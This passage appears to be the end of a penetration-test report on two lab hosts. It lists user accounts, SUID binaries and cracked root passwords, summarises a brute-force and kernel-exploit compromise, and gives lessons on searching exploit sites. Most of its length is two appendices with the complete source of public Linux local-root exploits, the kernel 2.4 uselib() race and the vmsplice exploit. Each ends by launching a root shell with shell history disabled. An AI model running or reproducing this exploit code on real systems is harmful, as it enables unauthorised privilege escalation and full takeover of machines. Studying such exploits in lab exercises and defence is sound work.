User accounts: adm, apache, avahi, bin, cptvm1, cptvm2, daemon, dbus, distcache, ftp, games, gdm, gopher, haldaemon, halt, lp, mail, mailnull, named, news, nfsnobody, nobody, nscd, ntp, operator, pcap, root, rpc, rpcuser, rpm, shutdown, smmsp, squid, sshd, sync, uucp, vcsa, webalizer, xfsFiles that execute as root: /usr/bin/sudo, /usr/bin/sudoedit, /media/.hal-mtab-lock, /usr/sbin/suexec, /usr/bin/Xorg, /usr/bin/chfn, /usr/bin/chsh, /usr/sbin/userhelper, /usr/lib/squid/ncsa_auth, /usr/lib/squid/pam_auth, /bin/mount, /bin/ping, /bin/ping6, /bin/su, /bin/umount, /sbin/mount.nfs, /sbin/mount.nfs4, /sbin/pam_timestamp_check, /sbin/umount.nfs, /sbin/umount.nfs4, /sbin/unix_chkpwd, /usr/bin/at, /usr/bin/chage, /usr/bin/gpasswd, /usr/bin/newgrp, /usr/bin/passwd, /usr/bin/rcp, /usr/bin/rlogin, /usr/bin/rsh, /usr/kerberos/bin/ksu, /usr/libexec/openssh/ssh-keysign, /usr/sbin/ccreds_validate, /usr/sbin/userisdnctl, /usr/sbin/usernetctlUsername/password: cptvm1/windows, cptvm2/linux, r00t/windows, root/admin

L. Ultimate goal

i. Cptvm1 and ctpvm2 hosts compromised

The initial access to the cptvm1 was obtained by brute force password guessing of the “user” account. After gaining basic access to the cptvm1 host, the “cptvm1” and “cptvm2” user accounts were brute force password attacked. This provided basic access to the cptvm2 hosts. The cptvm1 host was then compromised via a VMA exploit. Next, the cptvm2 host was compromised via a vmsplice exploit. Finally, the root passwords were cracked.

ii. Passwords for root accounts on cptvm1 and cptvm2

The password for root@cptvm1 is cavalryThe password for root@cptvm2 is admin

M. Lessons learned

i. Searching exploit sites

The quality of the exploits and exploit information varies radically between sites. For example, the milw0rm.com site has good quality code but limited information on the background of the exploit. In contrast, the www.securityfocus.com site has more extensive information about an exploit but may only list “Exploit code has been published” instead of actual exploit code.

With such a wide foot print for searches in mind, a site like secwatch.org should be the preferred solution. However, it was found that certain searches don't perform well via secwatch.org.

Page 44: Root Password

The use of a single site to complete exploit research isn't going to be a successful approach at this time.

ii. Attack vectors

All of the articles that I have read and the individuals that I have spoken with lateley state that the majority of the future exploits will be found outside of the operating system. With this in mind, I focused my search on items surrounding the kernel but waited to research the kernel exploits until the end. This proved to be the exactly opposite approach that was required for this examination.

Full research into the vulnerabilities of a target prior to attempting to execute any exploits is key. If this approach had been adhered to more, a full review of all of the vulnerabilities would have yielded the kernel exploits as the top contenders. This would have save quite a bit of time compiling, debugging and testing unsuccessful exploits.

5. Appendix

A. Source code for the Kernel 2.4 VMA exploit/* * Linux kernel 2.4 uselib() privilege elevation exploit. * * original exploit source from http://isec.pl * reference: http://isec.pl/vulnerabilities/isec-0021-uselib.txt * * I modified the Paul Starzetz's exploit, made it more possible * to race successfully. The exploit still works only on 2.4 series. * It should be also works on 2.4 SMP, but not easy. * * thx newbug. * * Tim Hsu <timhsu at chroot.org> Jan 2005. * */ #define _GNU_SOURCE

#include <stdio.h>#include <stdlib.h>#include <string.h>#include <fcntl.h>#include <unistd.h>#include <errno.h>#include <sched.h>#include <syscall.h>#include <limits.h>

#include <sys/types.h>#include <sys/wait.h>#include <sys/time.h>#include <sys/mman.h>#include <sys/sysinfo.h>

Page 45: Root Password

#include <linux/elf.h>#include <linux/linkage.h>

#include <asm/page.h>#include <asm/ldt.h>#include <asm/segment.h>

#define str(s) #s#define xstr(s) str(s)

#define MREMAP_MAYMOVE 1

// temp lib location#define LIBNAME "/tmp/_elf_lib"

// shell name#define SHELL "/bin/bash"

// time delta to detect race#define RACEDELTA 5000

// if you have more deadbabes in memory, change this#define MAGIC 0xdeadbabe

// do not touch#define SLAB_THRSH 128#define SLAB_PER_CHLD(INT_MAX - 1)#define LIB_SIZE ( PAGE_SIZE * 4 )#define STACK_SIZE ( PAGE_SIZE * 4 )

#define LDT_PAGES ( (LDT_ENTRIES*LDT_ENTRY_SIZE+PAGE_SIZE-1)/PAGE_SIZE )

#define ENTRY_GATE ( LDT_ENTRIES-1 )#define SEL_GATE ( (ENTRY_GATE<<3)|0x07 )

#define ENTRY_LCS ( ENTRY_GATE-2 )#define SEL_LCS ( (ENTRY_LCS<<3)|0x04 )

#define ENTRY_LDS ( ENTRY_GATE-1 )#define SEL_LDS ( (ENTRY_LDS<<3)|0x04 )

#define kB * 1024#define MB * 1024 kB#define GB * 1024 MB

#define TMPLEN 256#define PGD_SIZE ( PAGE_SIZE*1024 )

extern char **environ;

static char cstack[STACK_SIZE];static char name[TMPLEN];static char line[TMPLEN];

static pid_t consume_pid;

static volatile intval = 0,go = 0,finish = 0,scnt = 0,ccnt=0,

Page 46: Root Password

delta = 0,delta_max = RACEDELTA,map_flags = PROT_WRITE|PROT_READ;

static intfstop=0,silent=0,pidx,pnum=0,smp_max=0,smp,wtime=2,cpid,uid,task_size,old_esp,lib_addr,map_count=0,map_base=0,map_addr,addr_min,addr_max,vma_start,vma_end,max_page;

static struct timeval tm1, tm2;

static char *myenv[] = {"TERM=vt100","HISTFILE=/dev/null",NULL};

static char hellc0de[] = "\x49\x6e\x74\x65\x6c\x65\x63\x74\x75\x61\x6c\x20\x70\x72\x6f\x70" "\x65\x72\x74\x79\x20\x6f\x66\x20\x49\x68\x61\x51\x75\x65\x52\x00";

static char *pagemap, *libname=LIBNAME, *shellname=SHELL;

#define __NR_sys_gettimeofday __NR_gettimeofday#define __NR_sys_sched_yield __NR_sched_yield#define __NR_sys_madvise __NR_madvise#define __NR_sys_uselib __NR_uselib#define __NR_sys_mmap2 __NR_mmap2#define __NR_sys_munmap __NR_munmap#define __NR_sys_mprotect __NR_mprotect#define __NR_sys_mremap __NR_mremap

inline _syscall6(int, sys_mmap2, int, a, int, b, int, c, int, d, int, e, int, f);

inline _syscall5(int, sys_mremap, int, a, int, b, int, c, int, d, int, e);

inline _syscall3(int, sys_madvise, void*, a, int, b, int, c);inline _syscall3(int, sys_mprotect, int, a, int, b, int, c);inline _syscall3( int, modify_ldt, int, func, void *, ptr, int, bytecount );

inline _syscall2(int, sys_gettimeofday, void*, a, void*, b);inline _syscall2(int, sys_munmap, int, a, int, b);

Page 47: Root Password

inline _syscall1(int, sys_uselib, char*, l);

inline _syscall0(void, sys_sched_yield);

int consume_memory(){

struct sysinfo info;char *vmem;

sysinfo(&info);vmem = malloc(info.freeram);if (vmem == NULL){

perror("malloc");return -1;

}memset(vmem, 0x90, info.freeram);

}

inline int tmdiff(struct timeval *t1, struct timeval *t2){int r;

r=t2->tv_sec - t1->tv_sec;r*=1000000;r+=t2->tv_usec - t1->tv_usec;

return r;}

void fatal(const char *message, int critical){int sig = critical? SIGSTOP : (fstop? SIGSTOP : SIGKILL);

if(!errno) {fprintf(stdout, "\n[-] FAILED: %s ", message);

} else {fprintf(stdout, "\n[-] FAILED: %s (%s) ", message,

(char*) (strerror(errno)) );}if(critical)

printf("\nCRITICAL, entering endless loop");printf("\n");fflush(stdout);

unlink(libname);kill(cpid, SIGKILL);for(;;) kill(0, sig);

}

// try to race do_brk sleeping on kmalloc, may need modification for SMPint raceme(void* v){

finish=1;

for(;;) {errno = 0;

// check if raced:recheck:

if(!go) sys_sched_yield();

Page 48: Root Password

sys_gettimeofday(&tm2, NULL);delta = tmdiff(&tm1, &tm2);if(!smp_max && delta < (unsigned)delta_max) goto recheck;smp = smp_max;

// check if lib VMAs exist as expected under race conditionrecheck2:

val = sys_madvise((void*) lib_addr, PAGE_SIZE, MADV_NORMAL);if(val) continue;errno = 0;val = sys_madvise((void*) (lib_addr+PAGE_SIZE),

LIB_SIZE-PAGE_SIZE, MADV_NORMAL);if( !val || (val<0 && errno!=ENOMEM) ) continue;

// SMP?smp--;if(smp>=0) goto recheck2;

// recheck raceif(!go) continue;finish++;

// we need to free one vm_area_struct for mmap to workval = sys_mprotect(map_addr, PAGE_SIZE, map_flags);if(val) fatal("mprotect", 0);val = sys_mmap2(lib_addr + PAGE_SIZE, PAGE_SIZE*3, PROT_NONE,

MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED, 0, 0);if(-1==val) fatal("mmap2 race", 0);printf("\n[+] race won maps=%d", map_count); fflush(stdout);kill(consume_pid, SIGKILL);_exit(0);

}

return 0;}

int callme_1(){

return val++;}

inline int valid_ptr(unsigned ptr){

return ptr>=task_size && ptr<addr_min-16;}

inline int validate_vma(unsigned *p, unsigned s, unsigned e){unsigned *t;

if(valid_ptr(p[0]) && valid_ptr(p[3]) && p[1]==s && p[2]==e) {t=(unsigned*)p[3];if( t[0]==p[0] && t[1]<=task_size && t[2]<=task_size )

return 1;}return 0;

}

asmlinkage void kernel_code(unsigned *task){unsigned *addr = task;

Page 49: Root Password

// find & reset uidswhile(addr[0] != uid || addr[1] != uid || addr[2] != uid || addr[3] != uid)

addr++;

addr[0] = addr[1] = addr[2] = addr[3] = 0;addr[4] = addr[5] = addr[6] = addr[7] = 0;

// find & correct VMAfor(addr=(unsigned *)task_size; (unsigned)addr<addr_min-16; addr++) {

if( validate_vma(addr, vma_start, vma_end) ) {addr[1] = task_size - PAGE_SIZE;addr[2] = task_size;break;

}}

}

void kcode(void);

// CPL0 code mostly stolen from cliphvoid __kcode(void){asm(

"kcode: \n"" pusha \n"" pushl %es \n"" pushl %ds \n"" movl $(" xstr(SEL_LDS) ") ,%edx\n"" movl %edx,%es \n"" movl %edx,%ds \n"" movl $0xffffe000,%eax \n"" andl %esp,%eax \n"" pushl %eax \n"" call kernel_code \n"" addl $4, %esp \n"" popl %ds \n"" popl %es \n"" popa \n"" lret \n"

);}

int callme_2(){

return val + task_size + addr_min;}

void sigfailed(int v){

ccnt++;fatal("lcall", 1);

}

// modify LDT & execvoid try_to_exploit(unsigned addr){volatile int r, *v;

printf("\n[!] try to exploit 0x%.8x", addr); fflush(stdout);

Page 50: Root Password

unlink(libname);

r = sys_mprotect(addr, PAGE_SIZE, PROT_READ|PROT_WRITE|map_flags);if(r) fatal("mprotect 1", 1);

// check if really LDTv = (void*) (addr + (ENTRY_GATE*LDT_ENTRY_SIZE % PAGE_SIZE) );signal(SIGSEGV, sigfailed);r = *v;if(r != MAGIC) {

printf("\n[-] FAILED val = 0x%.8x", r); fflush(stdout);fatal("find LDT", 1);

}

// yeah, setup CPL0 gatev[0] = ((unsigned)(SEL_LCS)<<16) | ((unsigned)kcode & 0xffffU);v[1] = ((unsigned)kcode & ~0xffffU) | 0xec00U;printf("\n[+] gate modified ( 0x%.8x 0x%.8x )", v[0], v[1]);

fflush(stdout);

// setup CPL0 segment descriptors (we need the 'accessed' versions ;-)v = (void*) (addr + (ENTRY_LCS*LDT_ENTRY_SIZE % PAGE_SIZE) );v[0] = 0x0000ffff; /* kernel 4GB code at 0x00000000 */v[1] = 0x00cf9b00;

v = (void*) (addr + (ENTRY_LDS*LDT_ENTRY_SIZE % PAGE_SIZE) );v[0] = 0x0000ffff; /* kernel 4GB data at 0x00000000 */v[1] = 0x00cf9300;

// reprotect to get only one big VMAr = sys_mprotect(addr, PAGE_SIZE, PROT_READ|map_flags);if(r) fatal("mprotect 2", 1);

// CPL0 transitionsys_sched_yield();val = callme_1() + callme_2();asm("lcall $" xstr(SEL_GATE) ",$0x0");//if( getuid()==0 || (val==31337 && strlen(hellc0de)==31337) ) {if (getuid()==0) {

printf("\n[+] exploited, uid=0\n\n" ); fflush(stdout);} else {

printf("\n[-] uid change failed" ); fflush(stdout);sigfailed(0);

}signal(SIGTERM, SIG_IGN);kill(0, SIGTERM);setresuid(0, 0, 0);execl(shellname, "sh", NULL);fatal("execl", 0);

}

void scan_mm_finish();void scan_mm_start();

// kernel page table scan codevoid scan_mm(){

map_addr -= PAGE_SIZE;if(map_addr <= (unsigned)addr_min)

scan_mm_start();

scnt=0;val = *(int*)map_addr;

Page 51: Root Password

scan_mm_finish();}

void scan_mm_finish(){retry:

__asm__("movl%0, %%esp" : :"m"(old_esp) );

if(scnt) {pagemap[pidx] ^= 1;

}else {

sys_madvise((void*)map_addr, PAGE_SIZE, MADV_DONTNEED);}pidx--;scan_mm();goto retry;

}

// make kernel page maps before and after allocating LDTvoid scan_mm_start(){static int npg=0;static struct modify_ldt_ldt_s l;//static struct user_desc l;

pnum++;if(pnum==1) {

pidx = max_page-1;}else if(pnum==2) {

memset(&l, 0, sizeof(l));l.entry_number = LDT_ENTRIES-1;l.seg_32bit = 1;l.base_addr = MAGIC >> 16;l.limit = MAGIC & 0xffff;l.limit_in_pages = 1;if( modify_ldt(1, &l, sizeof(l)) != 0 )

fatal("modify_ldt", 1);pidx = max_page-1;

}else if(pnum==3) {

npg=0;for(pidx=0; pidx<=max_page-1; pidx++) {

if(pagemap[pidx]) {npg++;

}else if(npg == LDT_PAGES) {

npg=0;try_to_exploit(addr_min+(pidx-1)*PAGE_SIZE);

} else {npg=0;

}}fatal("find LDT", 1);

}

// save context & scan page table__asm__("movl%%esp, %0" : :"m"(old_esp) );map_addr = addr_max;scan_mm();

}

Page 52: Root Password

// return number of available SLAB objects in cacheint get_slab_objs(const char *sn){static int c, d, u = 0, a = 0;FILE *fp=NULL;char x1[20];

fp = fopen("/proc/slabinfo", "r");if(!fp)

fatal("get_slab_objs: fopen", 0);fgets(name, sizeof(name) - 1, fp);do {

c = u = a = -1;if (!fgets(line, sizeof(line) - 1, fp))

break;c = sscanf(line, "%s %u %u %u %u %u %u", name, &u, &a,

&d, &d, &d, &d);} while (strcmp(name, sn));close(fileno(fp));fclose(fp);return c == 7 ? a - u : -1;

}

long memmaped_size = 0;

// leave one object in the SLABinline void prepare_slab(){int *r;

map_addr -= PAGE_SIZE;map_count++;map_flags ^= PROT_READ;

r = (void*)sys_mmap2((unsigned)map_addr, PAGE_SIZE, map_flags, MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED, 0, 0);

if(MAP_FAILED == r) {printf("--> prepare_slab(), %dMb\n", memmaped_size/1024/1024);fatal("try again", 0);

}memmaped_size += PAGE_SIZE;*r = map_addr;

}

// sig handlersvoid segvcnt(int v){

scnt++;scan_mm_finish();

}

// child reapvoid reaper(int v){

ccnt++;waitpid(0, &v, WNOHANG|WUNTRACED);

}

// sometimes I get the VMAs in reversed order...// so just use anyone of the two but take care about the flagsvoid check_vma_flags();

Page 53: Root Password

void vreversed(int v){

map_flags = 0;check_vma_flags();

}

void check_vma_flags(){

if(map_flags) {__asm__("movl%%esp, %0" : :"m"(old_esp) );

} else {__asm__("movl%0, %%esp" : :"m"(old_esp) );goto out;

}signal(SIGSEGV, vreversed);val = * (unsigned*)(lib_addr + PAGE_SIZE);

out:}

// use elf library and try to sleep on kmallocvoid exploitme(){int r, sz, pcnt=0;static char smiley[]="-\\|/-\\|/";

// printf("\n cat /proc/%d/maps", getpid() ); fflush(stdout);// helper clone

finish=0; ccnt=0;sz = sizeof(cstack) / sizeof(cstack[0]);cpid = clone(&raceme, (void*) &cstack[sz-16],

CLONE_VM|CLONE_SIGHAND|CLONE_FS|SIGCHLD, NULL );if(-1==cpid) fatal("clone", 0);

// synchronize threadswhile(!finish) sys_sched_yield();finish=0;if(!silent) {

printf("\n"); fflush(stdout);}

// try to hit the kmalloc racefor(;;) {

r = get_slab_objs("vm_area_struct");//printf("\nfree slab = %d\n",r);while(r != 1 && r > 0) {

prepare_slab();r--;

}

sys_gettimeofday(&tm1, NULL);go = 1;r=sys_uselib(libname);go = 0;if(r) fatal("uselib", 0);if(finish) break;

// wipe lib VMAs and try againr = sys_munmap(lib_addr, LIB_SIZE);if(r) fatal("munmap lib", 0);

if(ccnt) goto failed;

Page 54: Root Password

if( !silent && !(pcnt%64) ) {printf("\r Wait... %c", smiley[ (pcnt/64)%8 ]);fflush(stdout);

}pcnt++;

}

// seems we raced, free memr = sys_munmap(map_addr, map_base-map_addr + PAGE_SIZE);if(r) fatal("munmap 1", 0);r = sys_munmap(lib_addr, PAGE_SIZE);if(r) fatal("munmap 2", 0);

// relax kswapdsys_gettimeofday(&tm1, NULL);for(;;) {

sys_sched_yield();sys_gettimeofday(&tm2, NULL);delta = tmdiff(&tm1, &tm2);if( wtime*1000000U <= (unsigned)delta ) break;

}

// we need to check the PROT_EXEC flagmap_flags = PROT_EXEC;check_vma_flags();if(!map_flags) {

printf("\n VMAs reversed"); fflush(stdout);}

// write protect brk's VMA to fool vm_enough_memory()r = sys_mprotect((lib_addr + PAGE_SIZE), LIB_SIZE-PAGE_SIZE,

PROT_READ|map_flags);if(-1==r) { fatal("mprotect brk", 0); }

// this will finally make the big VMA...sz = (0-lib_addr) - LIB_SIZE - PAGE_SIZE;

expand:r = sys_madvise((void*)(lib_addr + PAGE_SIZE),

LIB_SIZE-PAGE_SIZE, MADV_NORMAL);if(r) fatal("madvise", 0);r = sys_mremap(lib_addr + LIB_SIZE-PAGE_SIZE,

PAGE_SIZE, sz, MREMAP_MAYMOVE, 0);if(-1==r) {

if(0==sz) {fatal("mremap: expand VMA", 0);

} else {sz -= PAGE_SIZE;goto expand;

}}vma_start = lib_addr + PAGE_SIZE;vma_end = vma_start + sz + 2*PAGE_SIZE;printf("\n expanded VMA (0x%.8x-0x%.8x)", vma_start, vma_end);fflush(stdout);

// try to figure kernel layoutsignal(SIGCHLD, reaper);signal(SIGSEGV, segvcnt);signal(SIGBUS, segvcnt);scan_mm_start();

failed:printf("failed:\n");fatal("try again", 0);

Page 55: Root Password

}

// make fake ELF libraryvoid make_lib(){struct elfhdr eh;struct elf_phdr eph;static char tmpbuf[PAGE_SIZE];int fd;

// make our elf libraryumask(022);unlink(libname);fd=open(libname, O_RDWR|O_CREAT|O_TRUNC, 0755);if(fd<0) fatal("open lib ("LIBNAME" not writable?)", 0);memset(&eh, 0, sizeof(eh) );

// elf exec headermemcpy(eh.e_ident, ELFMAG, SELFMAG);eh.e_type = ET_EXEC;eh.e_machine = EM_386;eh.e_phentsize = sizeof(struct elf_phdr);eh.e_phnum = 1;eh.e_phoff = sizeof(eh);write(fd, &eh, sizeof(eh) );

// section header:memset(&eph, 0, sizeof(eph) );eph.p_type = PT_LOAD;eph.p_offset = 4096;eph.p_filesz = 4096;eph.p_vaddr = lib_addr;eph.p_memsz = LIB_SIZE;eph.p_flags = PF_W|PF_R|PF_X;write(fd, &eph, sizeof(eph) );

// execable codelseek(fd, 4096, SEEK_SET);memset(tmpbuf, 0x90, sizeof(tmpbuf) );write(fd, &tmpbuf, sizeof(tmpbuf) );close(fd);

}

// move stack down #2void prepare_finish(){int r;static struct sysinfo si;

old_esp &= ~(PAGE_SIZE-1);old_esp -= PAGE_SIZE;task_size = ((unsigned)old_esp + 1 GB ) / (1 GB) * 1 GB;r = sys_munmap(old_esp, task_size-old_esp);if(r) fatal("unmap stack", 0);

// setup rt envuid = getuid();lib_addr = task_size - LIB_SIZE - PAGE_SIZE;if(map_base)

map_addr = map_base;else

map_base = map_addr = (lib_addr - PGD_SIZE) & ~(PGD_SIZE-1);printf("\n[+] moved stack %x, task_size=0x%.8x, map_base=0x%.8x",

Page 56: Root Password

old_esp, task_size, map_base); fflush(stdout);

// check physical mem & preparesysinfo(&si);addr_min = task_size + si.totalram;addr_min = (addr_min + PGD_SIZE - 1) & ~(PGD_SIZE-1);addr_max = addr_min + si.totalram;if((unsigned)addr_max >= 0xffffe000 || (unsigned)addr_max <

(unsigned)addr_min)addr_max = 0xffffd000;

printf("\n[+] vmalloc area 0x%.8x - 0x%.8x", addr_min, addr_max);max_page = (addr_max - addr_min) / PAGE_SIZE;pagemap = malloc( max_page + 32 );if(!pagemap) fatal("malloc pagemap", 1);memset(pagemap, 0, max_page + 32);

// go gomake_lib();exploitme();

}

// move stack down #1void prepare(){unsigned p=0;

environ = myenv;

p = sys_mmap2( 0, STACK_SIZE, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, 0, 0 );

if(-1==p) fatal("mmap2 stack", 0);p += STACK_SIZE - 64;

__asm__("movl%%esp, %0 \n""movl %1, %%esp \n": : "m"(old_esp), "m"(p)

);

prepare_finish();}

void chldcnt(int v){

ccnt++;}

// alloc slab objects...inline void do_wipe(){int *r, c=0, left=0;

__asm__("movl%%esp, %0" : : "m"(old_esp) );

old_esp = (old_esp - PGD_SIZE+1) & ~(PGD_SIZE-1);old_esp = map_base? map_base : old_esp;

for(;;) {if(left<=0)

left = get_slab_objs("vm_area_struct");if(left <= SLAB_THRSH)

break;

Page 57: Root Password

left--;

map_flags ^= PROT_READ;old_esp -= PAGE_SIZE;r = (void*)sys_mmap2(old_esp, PAGE_SIZE, map_flags,

MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED, 0, 0 );if(MAP_FAILED == r)

break;

if(c>SLAB_PER_CHLD)break;

if( (c%1024)==0 ) {if(!c) printf("\n");printf("\r child %d VMAs %d", val, c);fflush(stdout);

}c++;

}printf("\r child %d VMAs %d", val, c);fflush(stdout);kill(getppid(), SIGUSR1);for(;;) pause();

}

// empty SLAB cachesvoid wipe_slab(){

signal(SIGUSR1, chldcnt);printf("\n[+] SLAB cleanup"); fflush(stdout);for(;;) {

ccnt=0;val++;cpid = fork();if(!cpid)

do_wipe();

while(!ccnt) sys_sched_yield();if( get_slab_objs("vm_area_struct") <= SLAB_THRSH )

break;}signal(SIGUSR1, SIG_DFL);

}

void usage(char *n){

printf("\nUsage: %s\t-f forced stop\n", n);printf("\t\t-s silent mode\n");printf("\t\t-c command to run\n");printf("\t\t-n SMP iterations\n");printf("\t\t-d race delta us\n");printf("\t\t-w wait time seconds\n");printf("\t\t-l alternate lib name\n");printf("\t\t-a alternate addr hex\n");printf("\n");_exit(1);

}

// give -s for forced stop, -b to clean SLABint main(int ac, char **av){int r;

Page 58: Root Password

while(ac) {r = getopt(ac, av, "n:l:a:w:c:d:fsh");if(r<0) break;

switch(r) {

case 'f' :fstop = 1;break;

case 's' :silent = 1;break;

case 'n' :smp_max = atoi(optarg);break;

case 'd':if(1!=sscanf(optarg, "%u", &delta_max) || delta_max >

100000u )fatal("bad delta value", 0);

break;

case 'w' :wtime = atoi(optarg);if(wtime<0) fatal("bad wait value", 0);break;

case 'l' :libname = strdup(optarg);break;

case 'c' :shellname = strdup(optarg);break;

case 'a' :if(1!=sscanf(optarg, "%x", &map_base))

fatal("bad addr value", 0);map_base &= ~(PGD_SIZE-1);break;

case 'h' :default:

usage(av[0]);break;

}}consume_pid = fork();

if (consume_pid == 0){

consume_memory();pause();return 0;

}// basic setup

uid = getuid();setpgrp();wipe_slab();prepare();

return 0;}

Page 59: Root Password

// milw0rm.com [2005-01-27]

B. Source code for the Kernel 2.6 vmsplice exploit/* * jessica_biel_naked_in_my_bed.c * * Dovalim z knajpy a cumim ze Wojta zas nema co robit, kura. * Gizdi, tutaj mate cosyk na hrani, kym aj totok vykeca. * Stejnak je to stare jak cyp a aj jakesyk rozbite. * * Linux vmsplice Local Root Exploit * By qaaz * * Linux 2.6.17 - 2.6.24.1 * * This is quite old code and I had to rewrite it to even compile. * It should work well, but I don't remeber original intent of all * the code, so I'm not 100% sure about it. You've been warned ;) * * -static -Wno-format */#define _GNU_SOURCE#include <stdio.h>#include <errno.h>#include <stdlib.h>#include <string.h>#include <malloc.h>#include <limits.h>#include <signal.h>#include <unistd.h>#include <sys/uio.h>#include <sys/mman.h>#include <asm/page.h>#define __KERNEL__#include <asm/unistd.h>

#define PIPE_BUFFERS 16#define PG_compound14#define uint unsigned int#define static_inline static inline __attribute__((always_inline))#define STACK(x) (x + sizeof(x) - 40)

struct page {unsigned long flags;int count;int mapcount;unsigned long private;void *mapping;unsigned long index;struct { long next, prev; } lru;

};

void exit_code();char exit_stack[1024 * 1024];

void die(char *msg, int err){

printf(err ? "[-] %s: %s\n" : "[-] %s\n", msg, strerror(err));fflush(stdout);fflush(stderr);exit(1);

}

Page 60: Root Password

#if defined (__i386__)

#ifndef __NR_vmsplice#define __NR_vmsplice 316#endif

#define USER_CS 0x73#define USER_SS 0x7b#define USER_FL 0x246

static_inlinevoid exit_kernel(){

__asm__ __volatile__ ("movl %0, 0x10(%%esp) ;""movl %1, 0x0c(%%esp) ;""movl %2, 0x08(%%esp) ;""movl %3, 0x04(%%esp) ;""movl %4, 0x00(%%esp) ;""iret": : "i" (USER_SS), "r" (STACK(exit_stack)), "i" (USER_FL), "i" (USER_CS), "r" (exit_code));

}

static_inlinevoid *get_current(){

unsigned long curr;__asm__ __volatile__ ("movl %%esp, %%eax ;""andl %1, %%eax ;""movl (%%eax), %0": "=r" (curr): "i" (~8191));return (void *) curr;

}

#elif defined (__x86_64__)

#ifndef __NR_vmsplice#define __NR_vmsplice 278#endif

#define USER_CS 0x23#define USER_SS 0x2b#define USER_FL 0x246

static_inlinevoid exit_kernel(){

__asm__ __volatile__ ("swapgs ;""movq %0, 0x20(%%rsp) ;""movq %1, 0x18(%%rsp) ;""movq %2, 0x10(%%rsp) ;""movq %3, 0x08(%%rsp) ;""movq %4, 0x00(%%rsp) ;""iretq": : "i" (USER_SS), "r" (STACK(exit_stack)), "i" (USER_FL), "i" (USER_CS), "r" (exit_code));

}

Page 61: Root Password

static_inlinevoid *get_current(){

unsigned long curr;__asm__ __volatile__ ("movq %%gs:(0), %0": "=r" (curr));return (void *) curr;

}

#else#error "unsupported arch"#endif

#if defined (_syscall4)#define __NR__vmsplice __NR_vmsplice_syscall4(

long, _vmsplice,int, fd,struct iovec *, iov,unsigned long, nr_segs,unsigned int, flags)

#else#define _vmsplice(fd,io,nr,fl) syscall(__NR_vmsplice, (fd), (io), (nr), (fl))#endif

static uint uid, gid;

void kernel_code(){

int i;uint *p = get_current();

for (i = 0; i < 1024-13; i++) {if (p[0] == uid && p[1] == uid && p[2] == uid && p[3] == uid && p[4] == gid && p[5] == gid && p[6] == gid && p[7] == gid) {

p[0] = p[1] = p[2] = p[3] = 0;p[4] = p[5] = p[6] = p[7] = 0;p = (uint *) ((char *)(p + 8) + sizeof(void *));p[0] = p[1] = p[2] = ~0;break;

}p++;

}

exit_kernel();}

void exit_code(){

if (getuid() != 0)die("wtf", 0);

printf("[+] root\n");putenv("HISTFILE=/dev/null");execl("/bin/bash", "bash", "-i", NULL);die("/bin/bash", errno);

}

int main(int argc, char *argv[])

Page 62: Root Password

{int pi[2];size_t map_size;char * map_addr;struct iovec iov;struct page *pages[5];

uid = getuid();gid = getgid();setresuid(uid, uid, uid);setresgid(gid, gid, gid);

printf("-----------------------------------\n");printf(" Linux vmsplice Local Root Exploit\n");printf(" By qaaz\n");printf("-----------------------------------\n");

if (!uid || !gid)die("!@#$", 0);

/*****/pages[0] = *(void **) &(int[2]){0,PAGE_SIZE};pages[1] = pages[0] + 1;

map_size = PAGE_SIZE;map_addr = mmap(pages[0], map_size, PROT_READ | PROT_WRITE, MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);if (map_addr == MAP_FAILED)

die("mmap", errno);

memset(map_addr, 0, map_size);printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size);printf("[+] page: 0x%lx\n", pages[0]);printf("[+] page: 0x%lx\n", pages[1]);

pages[0]->flags = 1 << PG_compound;pages[0]->private = (unsigned long) pages[0];pages[0]->count = 1;pages[1]->lru.next = (long) kernel_code;

/*****/pages[2] = *(void **) pages[0];pages[3] = pages[2] + 1;

map_size = PAGE_SIZE;map_addr = mmap(pages[2], map_size, PROT_READ | PROT_WRITE, MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);if (map_addr == MAP_FAILED)

die("mmap", errno);

memset(map_addr, 0, map_size);printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size);printf("[+] page: 0x%lx\n", pages[2]);printf("[+] page: 0x%lx\n", pages[3]);

pages[2]->flags = 1 << PG_compound;pages[2]->private = (unsigned long) pages[2];pages[2]->count = 1;pages[3]->lru.next = (long) kernel_code;

/*****/pages[4] = *(void **) &(int[2]){PAGE_SIZE,0};map_size = PAGE_SIZE;map_addr = mmap(pages[4], map_size, PROT_READ | PROT_WRITE, MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);

Page 63: Root Password

if (map_addr == MAP_FAILED)die("mmap", errno);

memset(map_addr, 0, map_size);printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size);printf("[+] page: 0x%lx\n", pages[4]);

/*****/map_size = (PIPE_BUFFERS * 3 + 2) * PAGE_SIZE;map_addr = mmap(NULL, map_size, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);if (map_addr == MAP_FAILED)

die("mmap", errno);

memset(map_addr, 0, map_size);printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size);

/*****/map_size -= 2 * PAGE_SIZE;if (munmap(map_addr + map_size, PAGE_SIZE) < 0)

die("munmap", errno);

/*****/if (pipe(pi) < 0) die("pipe", errno);close(pi[0]);

iov.iov_base = map_addr;iov.iov_len = ULONG_MAX;

signal(SIGPIPE, exit_code);_vmsplice(pi[1], &iov, 1, 0);die("vmsplice", errno);return 0;

}

// milw0rm.com [2008-02-09]